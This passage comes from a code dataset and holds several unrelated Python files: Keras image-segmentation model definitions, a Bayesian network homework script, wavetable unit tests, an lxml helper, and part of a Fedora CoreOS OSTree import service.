y=concatenate([y,y])\n y=add([A1,A4,y])\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n\n return y\n\ndef _conv_bn_relu(nb_filter, row, col, subsample = (1,1)):\n def f(input):\n conv_a = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', \n padding='same', use_bias = False)(input)\n \n norm_a = BatchNormalization()(conv_a)\n act_a = Activation(activation = 'relu')(norm_a)\n return act_a\n return f\n\n\n\ndef _conv_bn_relu_x2(nb_filter, row, col, subsample = (1,1)):\n def f(input):\n conv_a = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', padding = 'same',use_bias = False,\n kernel_regularizer = l2(weight_decay),\n bias_regularizer = l2(weight_decay))(input)\n norm_a = BatchNormalization()(conv_a)\n act_a = Activation(activation = 'relu')(norm_a)\n conv_b = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', padding = 'same',use_bias = False,\n kernel_regularizer = l2(weight_decay),\n bias_regularizer = l2(weight_decay))(act_a)\n norm_b = BatchNormalization()(conv_b)\n act_b = Activation(activation = 'relu')(norm_b)\n return act_b\n return f\n\ndef FCRN_A(input_dim, classes=3, pretrained_weights = None):\n input_ = Input (shape = (input_dim))\n\n block1 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(input_)\n act1 = Activation(activation = 'relu')(block1)\n pool1 = MaxPooling2D(pool_size=(2,2))(act1)\n\n block2 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool1)\n act2 = Activation(activation = 'relu')(block2)\n pool2 = MaxPooling2D(pool_size=(2,2))(act2)\n\n block3 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool2)\n act3 = Activation(activation = 'relu')(block3)\n pool3 = MaxPooling2D(pool_size=(2,2))(act3)\n\n block4 = Conv2D(512, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool3)\n act4 = Activation(activation = 'relu')(block4)\n\n up5=UpSampling2D(size = (2,2))(act4)\n act5 = Activation(activation = 'relu')(up5)\n block5 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act5)\n\n up6=UpSampling2D(size = (2,2))(block5)\n act6 = Activation(activation = 'relu')(up6)\n block6 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act6)\n\n up7=UpSampling2D(size = (2,2))(block6)\n act7 = Activation(activation = 'relu')(up7)\n block7 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act7)\n\n density_pred = Conv2D(classes, 1, 1, bias = False, activation='linear',init='orthogonal',name='pred',border_mode='same')(block7)\n\n model = Model (input = input_, output = density_pred)\n\n model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n return model\n\ndef FCRN_B(input_dim, classes=3, pretrained_weights = None):\n input_ = Input (shape = (input_dim))\n\n block1 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(input_)\n act1 = Activation(activation = 'relu')(block1)\n pool1 = MaxPooling2D(pool_size=(2,2))(act1)\n\n block2 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool1)\n act2 = Activation(activation = 'relu')(block2)\n\n block3 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act2)\n act3 = Activation(activation = 'relu')(block3)\n pool3 = MaxPooling2D(pool_size=(2,2))(act3)\n\n block4 = Conv2D(256, (5, 5),kernel_initializer = 'orthogonal', padding='same')(pool3)\n act4 = Activation(activation = 'relu')(block4)\n\n block5 = Conv2D(256, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act4)\n act5 = Activation(activation = 'relu')(block5)\n\n up6=UpSampling2D(size = (2,2))(act5)\n act6 = Activation(activation = 'relu')(up6)\n block6 = Conv2D(256, (5, 5),kernel_initializer = 'orthogonal', padding='same')(act6)\n\n up7=UpSampling2D(size = (2,2))(block6)\n act7 = Activation(activation = 'relu')(up7)\n density_pred = Conv2D(classes, 1, 1, bias = False, activation='linear',init='orthogonal',name='pred',border_mode='same')(act7)\n model = Model (input = input_, output = density_pred)\n\n model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n return model\n\ndef PathoNet(input_size = (256,256,3), classes=3, pretrained_weights = None):\n inputs = Input(input_size) \n\n block1= Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(inputs)\n block1 = BatchNormalization()(block1)\n block1 = LeakyReLU()(block1)\n block1= Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(block1)\n block1 = BatchNormalization()(block1)\n block1 = LeakyReLU()(block1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(block1)\n\n block2= residualDilatedInceptionModule(pool1,32,t=\"e\")\n pool2 = MaxPooling2D(pool_size=(2, 2))(block2)\n\n block3= residualDilatedInceptionModule(pool2,64,t=\"e\")\n pool3 = MaxPooling2D(pool_size=(2, 2))(block3)\n\n block4= residualDilatedInceptionModule(pool3,128,t=\"e\")\n pool4 = MaxPooling2D(pool_size=(2, 2))(block4)\n drop4 = Dropout(0.1)(pool4)\n\n block5= residualDilatedInceptionModule(drop4,256,t=\"e\")\n drop5 = Dropout(0.1)(block5)\n\n up6 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(drop5)),128,t=\"d\")\n merge6 = concatenate([block4,up6], axis = 3)\n\n up7 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge6)),64,t=\"d\")\n merge7 = concatenate([block3,up7], axis = 3)\n\n up8 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge7)),32,t=\"d\")\n merge8 = concatenate([block2,up8], axis = 3)\n\n up9 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge8)),16,t=\"d\")\n merge9 = concatenate([block1,up9], axis = 3)\n\n block9=Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(merge9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n block9=Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(block9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n block9=Conv2D(8, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(block9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n conv10 = Conv2D(classes, 1, activation = 'relu')(block9)\n\n model = Model(input = inputs, output = conv10)\n\n \n model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n return model\n\ndef Deeplabv3(weights=None, input_tensor=None, input_shape=(256, 256, 3), classes=3, backbone='mobilenetv2',\n OS=16, alpha=1., activation=None):\n \"\"\" Instantiates the Deeplabv3+ architecture\n Optionally loads weights pre-trained\n on PASCAL VOC or Cityscapes. This model is available for TensorFlow only.\n # Arguments\n weights: one of 'pascal_voc' (pre-trained on pascal voc),\n 'cityscapes' (pre-trained on cityscape) or None (random initialization)\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n input_shape: shape of input image. format HxWxC\n PASCAL VOC model was trained on (512,512,3) images. None is allowed as shape/width\n classes: number of desired classes. PASCAL VOC has 21 classes, Cityscapes has 19 classes.\n If number of classes not aligned with the weights used, last layer is initialized randomly\n backbone: backbone to use. one of {'xception','mobilenetv2'}\n activation: optional activation to add to the top of the network.\n One of 'softmax', 'sigmoid' or None\n OS: determines input_shape/feature_extractor_output ratio. One of {8,16}.\n Used only for xception backbone.\n alpha: controls the width of the MobileNetV2 network. This is known as the\n width multiplier in the MobileNetV2 paper.\n - If `alpha` < 1.0, proportionally decreases the number\n of filters in each layer.\n - If `alpha` > 1.0, proportionally increases the number\n of filters in each layer.\n - If `alpha` = 1, default number of filters from the paper\n are used at each layer.\n Used only for mobilenetv2 backbone. Pretrained is only available for alpha=1.\n # Returns\n A Keras model instance.\n # Raises\n RuntimeError: If attempting to run this model with a\n backend that does not support separable convolutions.\n ValueError: in case of invalid argument for `weights` or `backbone`\n \"\"\"\n\n if not (weights in {'pascal_voc', 'cityscapes', None}):\n raise ValueError('The `weights` argument should be either '\n '`None` (random initialization), `pascal_voc`, or `cityscapes` '\n '(pre-trained on PASCAL VOC)')\n\n if not (backbone in {'xception', 'mobilenetv2'}):\n raise ValueError('The `backbone` argument should be either '\n '`xception` or `mobilenetv2` ')\n\n if input_tensor is None:\n img_input = Input(shape=input_shape)\n else:\n img_input = input_tensor\n\n if backbone == 'xception':\n if OS == 8:\n entry_block3_stride = 1\n middle_block_rate = 2 # ! Not mentioned in paper, but required\n exit_block_rates = (2, 4)\n atrous_rates = (12, 24, 36)\n else:\n entry_block3_stride = 2\n middle_block_rate = 1\n exit_block_rates = (1, 2)\n atrous_rates = (6, 12, 18)\n\n x = Conv2D(32, (3, 3), strides=(2, 2),\n name='entry_flow_conv1_1', use_bias=False, padding='same')(img_input)\n x = BatchNormalization(name='entry_flow_conv1_1_BN')(x)\n x = Activation('relu')(x)\n\n x = _conv2d_same(x, 64, 'entry_flow_conv1_2', kernel_size=3, stride=1)\n x = BatchNormalization(name='entry_flow_conv1_2_BN')(x)\n x = Activation('relu')(x)\n\n x = _xception_block(x, [128, 128, 128], 'entry_flow_block1',\n skip_connection_type='conv', stride=2,\n depth_activation=False)\n x, skip1 = _xception_block(x, [256, 256, 256], 'entry_flow_block2',\n skip_connection_type='conv', stride=2,\n depth_activation=False, return_skip=True)\n\n x = _xception_block(x, [728, 728, 728], 'entry_flow_block3',\n skip_connection_type='conv', stride=entry_block3_stride,\n depth_activation=False)\n for i in range(16):\n x = _xception_block(x, [728, 728, 728], 'middle_flow_unit_{}'.format(i + 1),\n skip_connection_type='sum', stride=1, rate=middle_block_rate,\n depth_activation=False)\n\n x = _xception_block(x, [728, 1024, 1024], 'exit_flow_block1',\n skip_connection_type='conv', stride=1, rate=exit_block_rates[0],\n depth_activation=False)\n x = _xception_block(x, [1536, 1536, 2048], 'exit_flow_block2',\n skip_connection_type='none', stride=1, rate=exit_block_rates[1],\n depth_activation=True)\n\n else:\n OS = 8\n first_block_filters = _make_divisible(32 * alpha, 8)\n x = Conv2D(first_block_filters,\n kernel_size=3,\n strides=(2, 2), padding='same',\n use_bias=False, name='Conv')(img_input)\n x = BatchNormalization(\n epsilon=1e-3, momentum=0.999, name='Conv_BN')(x)\n x = Activation(relu6, name='Conv_Relu6')(x)\n\n x = _inverted_res_block(x, filters=16, alpha=alpha, stride=1,\n expansion=1, block_id=0, skip_connection=False)\n\n x = _inverted_res_block(x, filters=24, alpha=alpha, stride=2,\n expansion=6, block_id=1, skip_connection=False)\n x = _inverted_res_block(x, filters=24, alpha=alpha, stride=1,\n expansion=6, block_id=2, skip_connection=True)\n\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=2,\n expansion=6, block_id=3, skip_connection=False)\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,\n expansion=6, block_id=4, skip_connection=True)\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,\n expansion=6, block_id=5, skip_connection=True)\n\n # stride in block 6 changed from 2 -> 1, so we need to use rate = 2\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, # 1!\n expansion=6, block_id=6, skip_connection=False)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=7, skip_connection=True)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=8, skip_connection=True)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=9, skip_connection=True)\n\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=10, skip_connection=False)\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=11, skip_connection=True)\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=12, skip_connection=True)\n\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=2, # 1!\n expansion=6, block_id=13, skip_connection=False)\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=14, skip_connection=True)\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=15, skip_connection=True)\n\n x = _inverted_res_block(x, filters=320, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=16, skip_connection=False)\n\n # end of feature extractor\n\n # branching for Atrous Spatial Pyramid Pooling\n\n # Image Feature branch\n import tensorflow as tf\n shape_before = tf.shape(x)\n b4 = GlobalAveragePooling2D()(x)\n # from (b_size, channels)->(b_size, 1, 1, channels)\n b4 = Lambda(lambda x: K.expand_dims(x, 1))(b4)\n b4 = Lambda(lambda x: K.expand_dims(x, 1))(b4)\n b4 = Conv2D(256, (1, 1), padding='same',\n use_bias=False, name='image_pooling')(b4)\n b4 = BatchNormalization(name='image_pooling_BN', epsilon=1e-5)(b4)\n b4 = Activation('relu')(b4)\n # upsample. have to use compat because of the option align_corners\n size_before = tf.keras.backend.int_shape(x)\n b4 = Lambda(lambda x: tf.image.resize_bilinear(x, size_before[1:3]))(b4)\n # simple 1x1\n b0 = Conv2D(256, (1, 1), padding='same', use_bias=False, name='aspp0')(x)\n b0 = BatchNormalization(name='aspp0_BN', epsilon=1e-5)(b0)\n b0 = Activation('relu', name='aspp0_activation')(b0)\n\n # there are only 2 branches in mobilenetV2. not sure why\n if backbone == 'xception':\n # rate = 6 (12)\n b1 = SepConv_BN(x, 256, 'aspp1',\n rate=atrous_rates[0], depth_activation=True, epsilon=1e-5)\n # rate = 12 (24)\n b2 = SepConv_BN(x, 256, 'aspp2',\n rate=atrous_rates[1], depth_activation=True, epsilon=1e-5)\n # rate = 18 (36)\n b3 = SepConv_BN(x, 256, 'aspp3',\n rate=atrous_rates[2], depth_activation=True, epsilon=1e-5)\n\n # concatenate ASPP branches & project\n x = Concatenate()([b4, b0, b1, b2, b3])\n else:\n x = Concatenate()([b4, b0])\n\n x = Conv2D(256, (1, 1), padding='same',\n use_bias=False, name='concat_projection')(x)\n x = BatchNormalization(name='concat_projection_BN', epsilon=1e-5)(x)\n x = Activation('relu')(x)\n x = Dropout(0.1)(x)\n # DeepLab v.3+ decoder\n\n if backbone == 'xception':\n # Feature projection\n # x4 (x2) block\n size_before2 = tf.keras.backend.int_shape(x)\n x = Lambda(lambda xx: tf.image.resize_bilinear(xx,size_before2[1:3] * tf.constant(OS // 4)))(x)\n\n dec_skip1 = Conv2D(48, (1, 1), padding='same',\n use_bias=False, name='feature_projection0')(skip1)\n dec_skip1 = BatchNormalization(\n name='feature_projection0_BN', epsilon=1e-5)(dec_skip1)\n dec_skip1 = Activation('relu')(dec_skip1)\n x = Concatenate()([x, dec_skip1])\n x = SepConv_BN(x, 256, 'decoder_conv0',\n depth_activation=True, epsilon=1e-5)\n x = SepConv_BN(x, 256, 'decoder_conv1',\n depth_activation=True, epsilon=1e-5)\n\n # you can use it with arbitary number of classes\n if (weights == 'pascal_voc' and classes == 21) or (weights == 'cityscapes' and classes == 19):\n last_layer_name = 'logits_semantic'\n else:\n last_layer_name = 'custom_logits_semantic'\n\n x = Conv2D(classes, (1, 1), padding='same', name=last_layer_name)(x)\n size_before3 = tf.keras.backend.int_shape(img_input)\n x = Lambda(lambda xx: tf.image.resize_bilinear(xx,size_before3[1:3]))(x)\n\n # Ensure that the model takes into account\n # any potential predecessors of `input_tensor`.\n if input_tensor is not None:\n inputs = get_source_inputs(input_tensor)\n else:\n inputs = img_input\n\n if activation in {'softmax', 'sigmoid'}:\n x = tf.keras.layers.Activation(activation)(x)\n\n model = Model(inputs, x, name='deeplabv3plus')\n\n # load weights\n\n if weights == 'pascal_voc':\n if backbone == 'xception':\n weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH_X,\n cache_subdir='models')\n else:\n weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH_MOBILE,\n cache_subdir='models')\n model.load_weights(weights_path, by_name=True)\n elif weights == 'cityscapes':\n if backbone == 'xception':\n weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels_cityscapes.h5',\n WEIGHTS_PATH_X_CS,\n cache_subdir='models')\n else:\n weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels_cityscapes.h5',\n WEIGHTS_PATH_MOBILE_CS,\n cache_subdir='models')\n model.load_weights(weights_path, by_name=True)\n return model\n\ndef modelCreator(modelName,inputShape,classes,weights=None):\n if modelName==\"PathoNet\":\n model=PathoNet(input_size = inputShape, classes=classes,pretrained_weights = weights)\n elif modelName==\"FRRN_A\":\n model=FCRN_A(inputShape,classes=classes,pretrained_weights = weights)\n elif modelName==\"FCRN_B\":\n model=FCRN_B(inputShape,classes=classes,pretrained_weights = weights)\n elif modelName==\"Deeplab_xception\":\n model=Deeplabv3(weights=None, input_shape=inputShape, classes=classes, backbone='xception',\n OS=16, alpha=1., activation=None)\n model.summary()\n if weights!= None:\n model.load_weights(weights)\n elif modelName==\"Deeplab_mobilenet\":\n model=Deeplabv3(weights=None, input_shape=inputShape, classes=classes, backbone='mobilenetv2',\n OS=16, alpha=1., activation=None)\n model.summary()\n if weights!= None:\n model.load_weights(weights)\n else:\n raise ValueError('The `model` argument should be either '\n 'PathoNet,FRRN_A,FCRN_B,Deeplab_xception or Deeplab_mobilenet')\n return model\n ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":30642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596632148","text":"'''\nThis module implements the Bayesian network shown in the text, Figure 14.12a.\nIt's taken from the AIMA Python code.\n\n@author: kvlinden\n@version Jan 2, 2013\n\nModified by Roy Adams on 3/6/19 for CS344 at Calvin College.\n'''\n\nfrom probability import BayesNet, enumeration_ask, elimination_ask\n\n# Utility variables\nT, F = True, False\n\n# From AIMA code (probability.py) - Fig. 14.2 - burglary example\nwet_grass = BayesNet([\n ('Cloudy', '', 0.5),\n ('Sprinkler', 'Cloudy', {T: 0.1, F: 0.5}),\n ('Rain', 'Cloudy', {T: 0.8, F: 0.2}),\n ('WetGrass', 'Sprinkler Rain', {(T, T): 0.99, (T, F): 0.9, (F, T): 0.9, (F, F): 0.0}),\n ])\n\n# P(Cloudy) = <0.5, 0.5> This is directly from graph.\nprint(enumeration_ask('Cloudy', dict(), wet_grass).show_approx())\n\n# P(Sprinkler|Cloudy) = <0.1, 0.9> This is directly from graph.\nprint(enumeration_ask('Sprinkler', dict(Cloudy=T), wet_grass).show_approx())\n\n# P(Cloudy|Sprinkler, -Rain) = a * P(Sprinkler, -Rain|Cloudy) * P(Cloudy) = a * <0.1 * 0.2 * 0.5, 0.5 * 0.8 * 0.5> = <0.0476, 0.9524>\nprint(enumeration_ask('Cloudy', dict(Sprinkler=T, Rain=F), wet_grass).show_approx())\n\n# P(WetGrass|Cloudy, Sprinkler, Rain) = <0.99, 0.01> This is directly from graph.\nprint(enumeration_ask('WetGrass', dict(Cloudy=T, Sprinkler=T, Rain=T), wet_grass).show_approx())\n\n# P(Cloudy|-WetGrass) = a * P(-WetGrass|Cloudy) * P(Cloudy) =\n# a * [P(-WetGrass|Sprinkler, Rain) * P(Sprinkler|Cloudy) * P(Rain|Cloudy)\n# + P(-WetGrass|Sprinkler, -Rain) * P(Sprinkler|Cloudy) * P(-Rain|Cloudy)\n# + P(-WetGrass|-Sprinkler, Rain) * P(-Sprinkler|Cloudy) * P(Rain|Cloudy)\n# + P(-WetGrass|-Sprinkler, -Rain) * P(-Sprinkler|Cloudy) * P(-Rain|Cloudy)] * P(Cloudy) =\n# a * <[0.01 * 0.1 * 0.8 + 0.9 * 0.1 * 0.2 + 0.9 * 0.9 * 0.8 + 0.0 * 0.9 * 0.2] * 0.5,\n# <[0.01 * 0.5 * 0.2 + 0.9 * 0.5 * 0.8 + 0.9 * 0.5 * 0.2 + 0.0 * 0.5 * 0.8] * 0.5> = <0.639, 0.361>\nprint(enumeration_ask('Cloudy', dict(WetGrass=F), wet_grass).show_approx())\n","sub_path":"homework2/weather_bayes.py","file_name":"weather_bayes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27205955","text":"import tempfile\nimport random\nimport re\n\nfrom unittest import TestCase\nfrom pippi import wavetables, dsp, graph\n\nclass TestWavetables(TestCase):\n def test_random_window(self):\n length = random.randint(1, 1000)\n win = wavetables.window(dsp.RND, length)\n self.assertEqual(length, len(win))\n\n def test_bad_window_type(self):\n length = random.randint(1, 1000)\n self.assertRaises(TypeError, wavetables.window, 'this is not a window type', length)\n\n def test_random_wavetable(self):\n length = random.randint(1, 1000)\n wt = wavetables.wavetable(dsp.RND, length)\n self.assertEqual(length, len(wt))\n\n def test_bad_wavetable_type(self):\n length = random.randint(1, 1000)\n self.assertRaises(TypeError, wavetables.wavetable, 'this is not a wavetable type', length)\n\n def test_wtclass(self):\n wt1 = dsp.wt(dsp.RND, 4096)\n wt2 = dsp.wt(dsp.TRI, 4096)\n wt3 = dsp.wt([ random.random()+0.001 for _ in range(1000) ], 1000)\n\n self.assertTrue(max(wt1) > 0)\n self.assertTrue(max(wt2) > 0)\n self.assertTrue(max(wt3) > 0)\n self.assertEqual(len(wt1), 4096)\n self.assertEqual(len(wt2), 4096)\n self.assertEqual(len(wt3), 1000)\n\n \"\"\"\n def test_polyseg(self):\n score = 'sine 1,tri,0-1 rand,0.3-0.8'\n length = random.randint(100, 1000)\n for segment in score.split(' '):\n match = wavetables.SEGMENT_RE.match(segment)\n\n \n wt = wavetables.polyseg(score, length)\n\n self.assertEqual(len(wt), length)\n \"\"\"\n\n def test_randline(self):\n numpoints = random.randint(1, 10)\n wtsize = random.randint(10, 1000)\n\n wt = wavetables.randline(numpoints, wtsize=wtsize)\n self.assertEqual(len(wt), wtsize)\n\n lowvalue = random.triangular(0, 1)\n highvalue = random.triangular(1, 5)\n wt = wavetables.randline(numpoints, \n lowvalue=lowvalue, \n highvalue=highvalue, \n wtsize=wtsize\n )\n\n self.assertEqual(len(wt), wtsize)\n self.assertTrue(max(wt) <= highvalue)\n self.assertTrue(min(wt) >= lowvalue)\n\n\n","sub_path":"tests/test_wavetables.py","file_name":"test_wavetables.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"342108807","text":"def remove_node_keep_tail(node):\n '''\n The simplest way to remove a node from the lxml parse tree is to directly remove it from the parent with the code:\n\n > node.getparent().remove(node)\n\n This can have unexpected behavior when tags have tail text,\n as the tail text will also be removed.\n This function removes the html tag without removing the tail text.\n\n For details on tail text, see: https://docs.python.org/3/library/xml.etree.elementtree.html#xml.etree.ElementTree.Element.tail\n '''\n parent = node.getparent()\n if parent is not None:\n if node.tail:\n prev = node.getprevious()\n if prev is None:\n if not parent.text:\n parent.text = ''\n parent.text += ' ' + node.tail\n else:\n if not prev.tail:\n prev.tail = ''\n prev.tail += ' ' + node.tail\n node.clear()\n parent.remove(node)\n\n","sub_path":"metahtml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366044741","text":"#!/usr/bin/python3\n\nimport boto3\nimport botocore\nimport fedora_messaging\nimport fedora_messaging.api\nimport hashlib\nimport json\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nimport traceback\n\n# Set local logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nFEDORA_MESSAGING_TOPIC_LISTEN = (\n \"org.fedoraproject.prod.coreos.build.request.ostree-import\"\n)\nFEDORA_MESSAGING_TOPIC_RESPOND = FEDORA_MESSAGING_TOPIC_LISTEN + \".finished\"\n\n\n# We are processing the org.fedoraproject.prod.coreos.build.request.ostree-import topic\n# https://apps.fedoraproject.org/datagrepper/raw?topic=org.fedoraproject.prod.coreos.build.request.ostree-import&delta=100000\n# The schema was originally designed in:\n# https://github.com/coreos/fedora-coreos-tracker/issues/198#issuecomment-513944390\nEXAMPLE_MESSAGE_BODY = json.loads(\"\"\"\n{\n \"build_id\": \"30.20190905.0\",\n \"stream\": \"testing\",\n \"basearch\": \"x86_64\",\n \"commit\": \"s3://fcos-builds/prod/streams/testing/builds/30.20190905.0/x86_64/ostree-commit.tar\",\n \"checksum\": \"sha256:d01db6939e7387afa2492ac8e2591c53697fc21cf16785585f7f1ac0de692863\",\n \"ostree_ref\": \"fedora/x86_64/coreos/testing\",\n \"ostree_checksum\": \"b4beca154dab3696fd04f32ddab818102caa9247ec3192403adb9aaecc991bd9\",\n \"target_repo\": \"prod\"\n}\n\"\"\"\n)\n\nKNOWN_OSTREE_REPOS = {\n \"prod\": \"/mnt/koji/ostree/repo\",\n \"compose\": \"/mnt/koji/compose/ostree/repo\",\n}\n\n# Given a repo (and thus an input JSON) analyze existing koji tag set\n# and tag in any missing packages\nclass Consumer(object):\n def __init__(self):\n # Check the possible repos to make sure they exist\n for path in KNOWN_OSTREE_REPOS.values():\n if not ostree_repo_exists(path):\n raise Exception(f\"OSTree repo does not exist at {path}\")\n\n logger.info(\n \"Processing messages with topic: %s\" % FEDORA_MESSAGING_TOPIC_LISTEN\n )\n\n def __call__(self, message: fedora_messaging.api.Message):\n # Catch any exceptions and don't raise them further because\n # it will cause /usr/bin/fedora-messaging to crash and we'll\n # lose the traceback logs from the container\n try:\n self.process(message)\n logger.info(\"Sending SUCCESS message\")\n send_message(msg=message.body, status=\"SUCCESS\")\n except Exception as e:\n logger.error(\"Caught Exception!\")\n logger.error(\"###################################\")\n traceback.print_exc()\n logger.error(\"###################################\")\n logger.error(\"Replying with a FAILURE message...\")\n send_message(msg=message.body, status=\"FAILURE\")\n logger.error(\"\\t continuing...\")\n pass\n\n def process(self, message: fedora_messaging.api.Message):\n logger.debug(message.topic)\n logger.debug(message.body)\n\n # Grab the raw message body and parse out pieces\n msg = message.body\n basearch = msg[\"basearch\"]\n build_id = msg[\"build_id\"]\n checksum = msg[\"checksum\"]\n commit_url = msg[\"commit\"]\n ostree_checksum = msg[\"ostree_checksum\"]\n ostree_ref = msg[\"ostree_ref\"]\n stream = msg[\"stream\"]\n target_repo = msg[\"target_repo\"]\n\n # Qualify arguments\n if not checksum.startswith(\"sha256:\"):\n raise Exception(\"checksum value must start with sha256:\")\n if target_repo not in KNOWN_OSTREE_REPOS.keys():\n raise Exception(f\"Provided target repo is unknown: {target_repo}\")\n\n sha256sum = checksum[7:]\n target_repo_path = KNOWN_OSTREE_REPOS[target_repo]\n source_repo_path = None\n\n # Detect if the commit already exists in the target repo\n # NOTE: We assume here that an import won't be requested twice for\n # the same commit (i.e. someone adds detached metadata and\n # then does a second import request).\n if ostree_commit_exists(target_repo_path, ostree_checksum):\n logger.info(\n f\"Commit {ostree_checksum} already exists in the target repo. \"\n \"Skipping import\"\n )\n return\n\n # Import the OSTree commit to the specified repo. We'll use\n # a temporary directory to untar the repo into.\n with tempfile.TemporaryDirectory() as tmpdir:\n # If the target repo is the prod repo the commit could\n # already have been imported into the compose repo. If it\n # is already in the compose repo then let's just pull-local\n # from there to save downloading all from the net again.\n if target_repo == \"prod\" and ostree_commit_exists(\n repo=KNOWN_OSTREE_REPOS[\"compose\"], commit=ostree_checksum\n ):\n logger.info(\"Commit exists in compose repo. Importing from there\")\n source_repo_path = KNOWN_OSTREE_REPOS[\"compose\"]\n else:\n # Grab the file from s3 and then pull local\n untar_file_from_s3(url=commit_url, tmpdir=tmpdir, sha256sum=sha256sum)\n source_repo_path = tmpdir\n\n # one more sanity check: make sure buildid == version\n assert_commit_has_version(\n repo=source_repo_path, commit=ostree_checksum, version=build_id\n )\n # Import the commit into the target repo\n ostree_pull_local(\n commit=ostree_checksum,\n dstrepo=target_repo_path,\n srcrepo=source_repo_path,\n branch=ostree_ref,\n )\n\n\ndef runcmd(cmd: list, **kwargs: int) -> subprocess.CompletedProcess:\n try:\n # default args to pass to subprocess.run\n pargs = {\"check\": True, \"capture_output\": True}\n logger.debug(f\"Running command: {cmd}\")\n pargs.update(kwargs)\n cp = subprocess.run(cmd, **pargs)\n except subprocess.CalledProcessError as e:\n logger.error(\"Command returned bad exitcode\")\n logger.error(f\"COMMAND: {cmd}\")\n logger.error(f\" STDOUT: {e.stdout.decode()}\")\n logger.error(f\" STDERR: {e.stderr.decode()}\")\n raise e\n return cp # subprocess.CompletedProcess\n\n\ndef send_message(msg: dict, status: str):\n # Send back a message with all the original message body\n # along with an additional `status:` header with either\n # `SUCCESS` or `FAILURE`.\n fedora_messaging.api.publish(\n fedora_messaging.message.Message(\n topic=FEDORA_MESSAGING_TOPIC_RESPOND, body={\"status\": status, **msg}\n )\n )\n\n\n# https://stackoverflow.com/a/55542529\ndef get_sha256sum(filepath: str) -> str:\n h = hashlib.sha256()\n with open(filepath, \"rb\") as file:\n while True:\n # Reading is buffered, so we can read smaller chunks.\n chunk = file.read(h.block_size)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\n\ndef parse_s3_url(url: str) -> tuple:\n if not url.startswith(\"s3://\"):\n raise Exception(f\"Unable to parse the s3 url: {url}\")\n # Chop off s3:// and break into bucket / key\n bucket, key = url[5:].split(\"/\", 1)\n return 